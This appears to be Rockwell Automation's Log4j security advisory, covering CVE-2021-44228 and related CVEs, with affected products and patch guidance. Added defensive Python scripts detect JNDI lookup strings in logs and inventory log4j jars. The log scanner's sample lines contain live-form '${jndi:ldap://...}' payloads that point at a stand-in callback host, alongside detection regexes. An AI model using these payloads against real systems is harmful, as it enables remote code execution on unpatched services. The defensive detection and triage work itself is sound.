Version 1.1 – 15-Dec-2021. Updated Affected Products and Risk Mitigation & User Actions
Version 1.2 – 17-Dec-2021. Updated FTA DataView Versions affected
Version 2.0 – 19-Dec-2021. Updated Affected Products and Risk Mitigation & User Actions, etc.
Version 2.1 – January 7, 2022. Updated FactoryTalk® Analytics™ DataView, Data Flow ML, Warehouse Management Patch Guidance and User Actions, etc.
Version 2.2 – January 21, 2022. Updated DataView Mitigation Actions, etc.
Executive Summary
Rockwell Automation is aware of this vulnerability and of how it could, if exploited, potentially impact our customers’ environments. Rockwell Automation has completed its evaluation of how the mitigation techniques will impact the functionality and performance of the Rockwell Automation hardware, software, and pre-engineered products and solutions that incorporate this software.
Affected Products
Product Affected | Versions Affected
--- | ---
Plex (A Rockwell Automation Company) Industrial Internet of Things | All Versions < 2.17
Fiix (A Rockwell Automation Company) CMMS™ core V5 | This product is cloud-based and has been updated for all customers.
Warehouse Management | 4.01.00, 4.02.00, 4.02.01, 4.02.02
EIG (Discontinued) | 3.03.00
Industrial Data Center | 9300-NS-ESSENTIAL, 9300-NS-ESSENTIALPLUS – Gen 1, Gen 2, Gen 3, Gen 3.5
VersaVirtual™ Application | 9300-VV2000RN, 9300-VV2000EN, 9300-VV1000RN, 9300-VV1000EN – Series A
FactoryTalk® Analytics™ DataFlowML | All versions up to and including 4.00.00
FactoryTalk Analytics DataView | All
Firewall Managed Support – Cisco Firepower® Threat Defense | 9300-FMAN, 9300-FSYS Version 6.2.3 – 7.1.0
Vulnerability Details
CVE-2021-44228: Apache Log4j2 JNDI features do not help protect against attacker-controlled LDAP and other JNDI related endpoints
Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
CVSS v3.1 Base Score: 10/10 [Critical]
CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack
It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data, when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC), to craft malicious input data using a JNDI Lookup pattern, resulting in a denial of service (DoS) attack. Log4j 2.15.0 restricts JNDI LDAP lookups to localhost by default. Note that previous mitigations involving configuration, such as setting the system property log4j2.noFormatMsgLookup to true, do NOT mitigate this specific vulnerability.
CVSS v3.1 Base Score: 3.7/10 [Moderate]
CVSS v3.1 Vector: AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
CVE-2021-4104: JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data
JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.
CVSS v3.1 Base Score: 8.1/10 [High]
CVSS v3.1 Vector: AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE-2019-17571: Included in Log4j 1.2 is a SocketServer class that is vulnerable to deserialization of untrusted data
Included in Log4j 1.2 is a SocketServer class that is vulnerable to deserialization of untrusted data. When combined with a deserialization gadget, and when the SocketServer is listening to untrusted network traffic for log data, this can be exploited to remotely execute arbitrary code. This affects Log4j 1.2 versions up to and including 1.2.17.
CVSS v3.1 Base Score: 9.8/10 [Critical]
CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
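The four CVEs above share one trait from a defender's point of view: the dangerous input is a Log4j lookup string (`${jndi:...}`) that arrives in a field the application copies into a log message or into the Thread Context (MDC). The following detection script is an added example and is not part of the Rockwell Automation advisory; the log lines it scans are constructed, and the field names (`ua=`, `loginId=`) and the callback host `198.51.100.7` (a TEST-NET-2 address) are assumptions chosen for illustration. It flags lines that carry a JNDI lookup, notes any other lookup syntax arriving in request-derived fields, and tallies the hosts the lookups point at so that the result can be pivoted into egress firewall logs while the upgrades listed later in this advisory are rolled out.

```python
import re
from collections import Counter

# Log4j 2 lookup syntax is ${name:...}; the lookup the advisory describes is ${jndi:...}.
# Match case-insensitively and tolerate whitespace so trivial variation does not slip past.
# Group 1 is the URI scheme (ldap, rmi, ...), group 2 the host the lookup would contact.
JNDI_LOOKUP_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/:}\s]+)", re.IGNORECASE)
# Any ${...} at all in a client-supplied field is unexpected and worth a second look.
ANY_LOOKUP_RE = re.compile(r"\$\{[^{}]*\}")

# Constructed sample lines (not taken from the advisory). The ua= and loginId= fields are
# request-derived, i.e. attacker-influenced; loginId stands in for a value that a Thread
# Context (MDC) pattern such as $${ctx:loginId} would copy into every log line.
SAMPLE_LOG_LINES = [
    '2021-12-11 10:02:13 INFO  web GET /index.html 200 ua="Mozilla/5.0" loginId=-',
    '2021-12-11 10:02:14 INFO  web GET /login 200 ua="curl/7.79" loginId=alice',
    '2021-12-11 10:02:15 WARN  web GET /index.html 404 ua="${jndi:ldap://198.51.100.7:1389/x}" loginId=-',
    '2021-12-11 10:02:16 INFO  web GET /login 200 ua="Mozilla/5.0" loginId=${JNDI:rmi://198.51.100.7/y}',
    '2021-12-11 10:02:17 INFO  web GET /login 200 ua="${date:yyyy}" loginId=bob',
]


def classify_line(line):
    """Return ('jndi-lookup', scheme, host), ('other-lookup', None, None) or None."""
    m = JNDI_LOOKUP_RE.search(line)
    if m:
        return ("jndi-lookup", m.group(1).lower(), m.group(2))
    if ANY_LOOKUP_RE.search(line):
        return ("other-lookup", None, None)
    return None


def scan(lines):
    """Return [(line_index, verdict, scheme, host)] for every line carrying a lookup."""
    hits = []
    for i, line in enumerate(lines):
        verdict = classify_line(line)
        if verdict is not None:
            hits.append((i,) + verdict)
    return hits


def callback_hosts(hits):
    """Count the hosts JNDI lookups point at, for pivoting into egress/firewall logs."""
    return Counter(host for _, verdict, _, host in hits if verdict == "jndi-lookup")


if __name__ == "__main__":
    found = scan(SAMPLE_LOG_LINES)
    for hit in found:
        print(hit)
    print(callback_hosts(found))
```

A hit on a line does not by itself mean the lookup was evaluated: on Log4j 2.16.0 or later, or on a system that has already been upgraded per the table below, the string is logged as plain text. The value of the scan is in prioritising which hosts to check for outbound connections to the listed callback addresses.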
Risk Mitigation & User Action
Vulnerability | Products Affected | Suggested Actions
--- | --- | ---
CVE-2021-44228 | Plex Industrial IoT | This product has been updated to version 2.17.1 and all vulnerabilities are mitigated at this time. No user action is required.
CVE-2021-44228 | Fiix CMMS core V5 | The product has been updated to remove Log4j completely and is no longer vulnerable. No user interaction is required.
CVE-2021-44228 | Warehouse Management Version 4.01.00, 4.02.00, 4.02.01, 4.02.02 | Customers should upgrade to version 4.02.03, which has been released to mitigate this vulnerability.
CVE-2021-44228 | MES EIG 3.03.00 | This product is currently discontinued and therefore no patch will be provided. Customers should upgrade to EIG Hub if possible or work with their local representatives about alternative solutions.
CVE-2021-44228 | Industrial Data Center (9300-NS-ESSENTIAL, 9300-NS-ESSENTIALPLUS) – Gen 1, Gen 2, Gen 3, Gen 3.5 | For non-managed support customers, follow the mitigation instructions outlined by VMware in VMSA-2021-0028. For managed support customers, the Rockwell Automation support team will be reaching out to affected customers to implement mitigation steps; for specific site details, please contact the support team or your Customer Success Manager. For non-managed support customers with a VNxE, follow the mitigation outlined by Dell in DSA-2021-298. For non-managed support customers with a Data Domain, follow the mitigation outlined by Dell in DSA-2021-274.
CVE-2021-44228 | VersaVirtual (9300-VV2000RN, 9300-VV2000EN, 9300-VV1000RN, 9300-VV1000EN) – Series A | For non-managed support customers, follow the mitigation instructions outlined by VMware in VMSA-2021-0028.2. For managed support customers, the Rockwell Automation support team will be reaching out to affected customers to implement mitigation steps; for specific site details, please contact the support team or your Customer Success Manager.
CVE-2021-44228 | FactoryTalk Analytics DataFlowML | Customers should upgrade to version 4.00.01, which has been released to mitigate this vulnerability. It is recommended that customers not use DataFlow ML prior to version 4.00.01.
CVE-2021-44228 | FactoryTalk Analytics DataView 3.02 | Customers are required to upgrade from 3.02 to 3.03.01. Customers who have prior versions are required to upgrade to 3.02 first. It is recommended that customers not use DataFlow ML prior to version 4.00.00.
CVE-2021-44228 | Firewall Managed Support – Cisco Firepower Threat Defense (9300-FMAN, 9300-FSYS) Version 6.2.3 – 7.1.0 | For managed support customers, the Rockwell Automation support team will be reaching out to affected customers to implement mitigation steps; for specific site details, please contact the support team or your Customer Success Manager. For non-managed support customers, follow the mitigation instructions outlined by Cisco in CSCwa46963.
CVE-2021-45046, CVE-2021-4104, CVE-2019-17571 | None | No products affected at this time.
Products Using Log4j 1.2
A number of Rockwell Automation products contain log4j libraries that may be detected by various scanning tools. These products do not use the JMSAppender nor the Socket Server and are not vulnerable to CVE-2021-4104 and CVE-2019-17571:
Products Evaluated and Not Affected | Suggested Actions
--- | ---
FactoryTalk Analytics DataView 3.02.00, 3.03.00, 4.00.00, 4.01.00; Data Scheduler; FactoryTalk Augmented Modeler; FactoryTalk Analytics DataFlowML 2.01; FactoryTalk Analytics Information Platform; Live Transfer 10.4, 11.0; Pavilion8; FactoryTalk Analytics Security Provider 3.02.00, 3.03.00; PanelView 5000; FactoryTalk Production Centre (All Versions); FactoryTalk PharmaSuite (All Versions) | No actions are needed as these products do not use the JMSAppender nor the Socket Server and therefore are not vulnerable.
Studio 5000 View Designer | Studio 5000 does not use the JMSAppender nor the Socket Server and is not vulnerable. Note: Studio 5000 consists of Studio 5000 Logix Designer and Studio 5000 View Designer. If Logix Designer is the only component required, then View Designer version 8 or older may be removed by uninstalling it using the Windows Add/Remove Programs feature: uninstall “Studio 5000 View Designer”. This will remove the log4j 1.2.x library completely. Alternatively, update Studio 5000 View Designer to version 9 or later, which has updated log4j libraries that are not vulnerable.
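The point of this section is that a scanner finding a log4j jar is only the start of triage: a log4j-core 2.x jar needs its version compared against the CVE-2021-44228 ranges quoted earlier, while a Log4j 1.2 jar matters only if JMSAppender or SocketServer are actually configured. The inventory helper below is an added example, not a Rockwell Automation or Apache tool. It reads the Maven `pom.properties` that upstream jars carry, applies the 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 ranges from this advisory, and reports which risk-relevant classes are present. The class paths are the upstream jar layout (an assumption; repackaged or shaded jars may differ), and the jars it inspects are constructed in memory with only the properties file and empty class entries.

```python
import io
import re
import zipfile

# CVE-2021-44228 ranges as stated in the advisory (inclusive at both ends).
AFFECTED_LOG4J2_RANGES = [("2.0-beta9", "2.12.1"), ("2.13.0", "2.15.0")]

# Upstream jar layout (assumption: jars are not repackaged or shaded).
LOG4J2_JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
LOG4J1_JMS_APPENDER = "org/apache/log4j/net/JMSAppender.class"
LOG4J1_SOCKET_SERVER = "org/apache/log4j/net/SocketServer.class"
POM_PROPS = {
    "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties": "log4j-core",
    "META-INF/maven/log4j/log4j/pom.properties": "log4j-1.x",
}

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-([A-Za-z]+)(\d*))?$")


def parse_version(text):
    """Turn '2.12.1' or '2.0-beta9' into a comparable tuple. A final release sorts after
    any pre-release of the same number; only beta tags occur in the affected range."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised log4j version: {text!r}")
    major, minor, patch, tag, tagnum = m.groups()
    is_final = 1 if tag is None else 0
    return (int(major), int(minor), int(patch or 0), is_final, int(tagnum or 0))


def log4j2_affected_by_44228(version):
    v = parse_version(version)
    return any(parse_version(lo) <= v <= parse_version(hi) for lo, hi in AFFECTED_LOG4J2_RANGES)


def inspect_jar(jar_bytes):
    """Classify one jar: artefact, version, CVE-2021-44228 status and risk-relevant classes."""
    row = {"artifact": None, "version": None, "cve_2021_44228": False, "flags": []}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        names = set(zf.namelist())
        for path, artifact in POM_PROPS.items():
            if path in names:
                props = zf.read(path).decode("utf-8", errors="replace")
                m = re.search(r"^version=(.+)$", props, re.MULTILINE)
                row["artifact"] = artifact
                row["version"] = m.group(1).strip() if m else None
        if row["artifact"] == "log4j-core" and row["version"]:
            row["cve_2021_44228"] = log4j2_affected_by_44228(row["version"])
            if LOG4J2_JNDI_LOOKUP in names:
                row["flags"].append("JndiLookup class present")
        elif row["artifact"] == "log4j-1.x":
            # Log4j 1.2 is end of life; per the advisory its CVEs need JMSAppender or
            # SocketServer to be in use, so presence only means "review the configuration".
            if LOG4J1_JMS_APPENDER in names:
                row["flags"].append("JMSAppender present - check CVE-2021-4104 config")
            if LOG4J1_SOCKET_SERVER in names:
                row["flags"].append("SocketServer present - check CVE-2019-17571 config")
    return row


def build_sample_jar(pom_path, version, class_paths):
    """Constructed stand-in for a real jar: a pom.properties plus empty class entries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(pom_path, f"version={version}\n")
        for cp in class_paths:
            zf.writestr(cp, b"")
    return buf.getvalue()


_CORE_POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
_V1_POM = "META-INF/maven/log4j/log4j/pom.properties"
SAMPLES = {  # constructed inputs, not real vendor artefacts
    "core-2.14.1": build_sample_jar(_CORE_POM, "2.14.1", [LOG4J2_JNDI_LOOKUP]),
    "core-2.12.2": build_sample_jar(_CORE_POM, "2.12.2", [LOG4J2_JNDI_LOOKUP]),
    "core-2.17.1": build_sample_jar(_CORE_POM, "2.17.1", []),
    "log4j-1.2.17": build_sample_jar(_V1_POM, "1.2.17", [LOG4J1_JMS_APPENDER, LOG4J1_SOCKET_SERVER]),
}


def inventory(samples=SAMPLES):
    return {name: inspect_jar(data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, row in inventory().items():
        print(name, row)
```

On a real host, `SAMPLES` would be replaced by the bytes of each jar found on disk; the classification logic is unchanged. Note that 2.12.2 falls outside both ranges the advisory quotes, so it is reported as not affected by CVE-2021-44228 even though the JndiLookup class is still present, which is why the class flag is reported separately from the version verdict.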
General Security Guidelines
Refer to the Industrial Security Services website for information on security services from Rockwell Automation to assess, protect, detect, respond and recover from incidents. These services include assessments, designs, implementations, industrial anomaly detection, patch management, and remote infrastructure monitoring and administration.
We also recommend concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located in PN1354 – Industrial Security Advisory Index.
Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor control products, you can visit the Rockwell Automation Security Solutions website.
If you have questions regarding this notice, please send an email to our product security inbox at: secure@ra.rockwell.com.
General Mitigations
- Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
- Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet-accessible control systems, please see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet.
- Locate control system networks and devices behind firewalls and isolate them from the business network.
- Visit the links below for more mitigation techniques:
  - NVD - CVE-2021-44228 (nist.gov)
  - NVD - CVE-2021-45046 (nist.gov)
  - NVD - CVE-2021-4104 (nist.gov)
  - NVD - CVE-2019-17571 (nist.gov)
  - Apache Log4j Vulnerability Guidance | CISA
  - Log4j – Apache Log4j Security Vulnerabilities
  - PN1354 - Industrial Security Advisory Index
  - Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide